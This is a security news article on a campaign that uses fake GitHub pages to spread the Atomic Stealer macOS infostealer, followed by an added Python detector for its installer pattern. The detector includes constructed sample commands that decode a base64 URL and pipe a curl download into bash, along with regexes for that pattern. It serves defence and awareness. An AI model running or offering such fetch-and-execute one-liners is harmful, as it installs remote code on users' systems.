Security researchers at Malwarebytes have uncovered a widespread campaign using fake GitHub pages to distribute macOS information-stealing malware. The operation impersonates legitimate software projects and tricks users into installing a strain of Mac infostealer dubbed Atomic Stealer.
These counterfeit pages mimic legitimate project repositories and sometimes appear in search results or through paid ads that direct users to GitHub instead of official vendor sites. Visitors to these pages encounter “download” or install buttons that lead to instructions for running a single command. This command fetches and executes a malicious shell script that installs the malware, bypassing normal safety checks.
Technical analysis reveals the installer’s typical pattern: a one-line shell command that decodes a base64 string to reveal a URL, then uses “curl -fsSL <url> | bash” to download and immediately run an install.sh script. This approach avoids download inspection and exploits the user’s shell to deliver the payload swiftly and stealthily. Such tactics are common in attacks aimed at macOS users to steal sensitive credentials, tokens, and other personal data.
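As an added example (not code from the article or from Malwarebytes), the following Python detector flags the installer pattern described above in shell command lines, such as entries from a shell history file or an EDR process log: it decodes base64 tokens to expose a hidden URL and flags downloads piped straight into a shell. The command lines and the URL are constructed samples, not real indicators.

```python
import base64
import re

# Constructed sample data: a placeholder URL and three command lines that
# mimic the pattern (encoded URL, curl | bash) plus one benign install.
SAMPLE_URL = "https://example.invalid/install.sh"
ENCODED_URL = base64.b64encode(SAMPLE_URL.encode()).decode()
SAMPLE_COMMANDS = [
    f'echo "{ENCODED_URL}" | base64 -d | xargs -I{{}} sh -c "curl -fsSL {{}} | bash"',
    "curl -fsSL https://example.invalid/install.sh | bash",
    "brew install --cask some-app",
]

# Candidate base64 blobs: long runs of the base64 alphabet with optional padding.
BASE64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# "| sh", "| bash", "| zsh", optionally via sudo.
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
# macOS ships BSD base64, which historically decoded with -D rather than -d.
BASE64_DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
URL_IN_TEXT = re.compile(r"https?://[^\s'\"]+")


def decode_base64_urls(command):
    """Return any URLs hidden inside base64 tokens of a command line."""
    urls = []
    for token in BASE64_TOKEN.findall(command):
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except ValueError:  # binascii.Error and UnicodeDecodeError are subclasses
            continue
        urls.extend(URL_IN_TEXT.findall(decoded))
    return urls


def analyze_command(command):
    """Return a list of human-readable findings for one command line."""
    findings = []
    if DOWNLOADER.search(command) and PIPE_TO_SHELL.search(command):
        findings.append("downloads content and pipes it directly into a shell")
    if BASE64_DECODE.search(command):
        findings.append("decodes base64 at run time")
    hidden = decode_base64_urls(command)
    if hidden:
        findings.append("base64-encoded URL(s): " + ", ".join(hidden))
    return findings


def scan_commands(commands):
    """Map each suspicious command line to its findings; benign lines are omitted."""
    return {cmd: f for cmd in commands if (f := analyze_command(cmd))}
```

Feeding a user's `~/.zsh_history` or process-creation events through `scan_commands` surfaces exactly the one-liners the article warns about, with the decoded destination URL ready for blocking or investigation.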
The campaign’s reach is extensive. The threat actors impersonated dozens of well-known applications and services, ranging from password managers and developer tools to financial platforms and creative software. Some targets include Malwarebytes, LastPass, 1Password, Docker, Dropbox, Notion, Robinhood, Shopify, Thunderbird and various cryptocurrency projects, and researchers warn that this list is likely to grow as the campaign continues.
Malwarebytes’ tools, Malwarebytes for Mac and ThreatDown, do detect and block the Atomic Stealer variant. Still, prevention remains paramount. Users are advised to avoid running shell commands copied from untrusted web pages and to download software only from official vendor sources. Users should exercise caution before clicking on ads promising downloads, as sponsored search results are a common infection vector in this campaign.
For Macs already compromised, remediation can be challenging. Recommended actions include scanning with reputable anti-malware tools, removing suspicious persistence mechanisms such as rogue LaunchAgents and login items, and examining for unauthorized browser extensions or wallet applications.
Because some malware can establish persistent backdoors or infect backups, a full macOS reinstall from a clean source is recommended if suspicious activity persists. Users should also change all passwords and enable multi-factor authentication on important accounts after cleanup.
This campaign highlights the critical importance of cautious software installation practices and user awareness. Never execute commands directly from unfamiliar web sources, especially those piping downloads straight into a shell, and always verify download origins.
For more technical details and ongoing updates, read Malwarebytes’ full analysis report.